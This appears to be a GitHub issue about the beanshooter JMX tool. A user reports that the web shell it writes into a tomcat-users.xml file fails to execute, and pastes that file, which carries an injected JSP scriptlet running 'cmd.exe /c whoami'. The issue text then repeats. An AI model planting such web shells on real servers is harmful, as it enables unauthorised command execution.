Open 0xE1C9 opened 2 weeks ago
Hi , Thanks for the great tool
i am on case that the webserver dosn't have any user , so the tool is creating user to write a web shell.
the tool is writing the webshell + xml content which preventing the jsp file from execution.
here is an example from the uploaded web shell
<?xml version='1.0' encoding='utf-8'?><tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd" version="1.0"> <role rolename="__beanshooterRole__" description=""/><%ProcessBuilder pb = new ProcessBuilder("cmd.exe", "/c", "whoami");pb.redirectOutput(new java.io.File("whoami.txt"));pb.start();%><a h=""/></tomcat-users>
@qtc-de
Hi , Thanks for the great tool
i am on case that the webserver dosn't have any user , so the tool is creating user to write a web shell.
the tool is writing the webshell + xml content which preventing the jsp file from execution.
here is an example from the uploaded web shell